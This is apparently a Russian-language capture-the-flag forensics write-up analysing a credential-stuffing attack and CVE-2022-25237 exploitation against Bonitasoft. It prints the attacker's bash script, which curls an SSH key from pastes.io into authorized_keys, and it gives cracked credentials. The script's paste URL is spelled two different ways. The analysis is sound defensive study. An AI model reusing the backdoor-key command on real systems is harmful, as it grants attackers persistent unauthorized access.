Сценарий

Forela - это быстро растущая компания, которая использует особую программу для управления своим бизнесом. К сожалению, у нас мало инструкций, и админы не очень хорошо разбираются в безопасности. Мы хотим, чтобы вы, как наш новый защитник, проверили файлы с данными о сети и событиях, чтобы убедиться, что нас не взломали.

Вопросы

  1. Как называется атакованное приложение?
  2. Как называется такая брутфорс-атака?
  3. Привести идентификатор эксплуатированной уязвимости.
  4. Какую строку атакующий добавлял к API, чтобы обойти фильтрацию?
  5. Сколько комбинаций логин + пароль было применено в атаке?
  6. Какие креды удалось подобрать?
  7. Какой сайт для обмена текстовыми заметками использовал атакующий?
  8. Какая хеш-сумма MD5 скрипта, с помощью которого атакующий получил доступ?
  9. Какая хеш-сумма MD5 публичного ключа атакующего?
  10. Какой файл модифицировал атакующий для закрепления в системе?
  11. Привести идентификатор техники закрепления по классификации MITRE.

Расследование

Посмотрим на файл meerkat-alerts.json. Поиском по CVE находим идентификатор уязвимости CVE-2022-25237, а рядом с ним название приложения - Bonitasoft.

Alt text

При исследовании видим сайт для обмена текстовыми заметками pastes.io, который атакующий использовал.

Alt text

Смотрим в PCAP-файл. Видим обращения на /bonita/loginservice и находим креды [email protected]:g0vernm3nt.

Alt text

Если посмотреть другие запросы к этому эндпоинту, то можно понять, что используется атака credential stuffing.

Alt text

Также можно отметить, что комбинаций логин:пароль было 56.

Эксплоит использовал i18ntranslation, чтобы обойти авторизационный фильтр.

Alt text

Выполненный на атакуемой машине скрипт был загружен с https://pastes.io/raw/5x5gcr0et8.

Alt text

#!/bin/bash
curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart

Скрипт выкачивает из https://pastes.io/raw/hffgra4unv публичный ключ и добавляет его в список авторизованных ключей пользователя ubuntu на машине (/home/ubuntu/.ssh/authorized_keys, после чего перезапускает сервис SSH.

Вычислим MD5 хеш-сумму от публичного ключа и скрипта.

# публичный ключ
$ curl --silent https://pastes.io/raw/hffgra4unv | md5sum | cut -d ' ' -f 1
dbb906628855a433d70025b6692c05e7
# скрипт
$ curl --silent https://pastes.io/raw/bx5gcr0et8 | md5sum | cut -d ' ' -f 1
0dc54416c346584539aa985e9d69a98e

По классификации MITRE идентификатор T1098.004.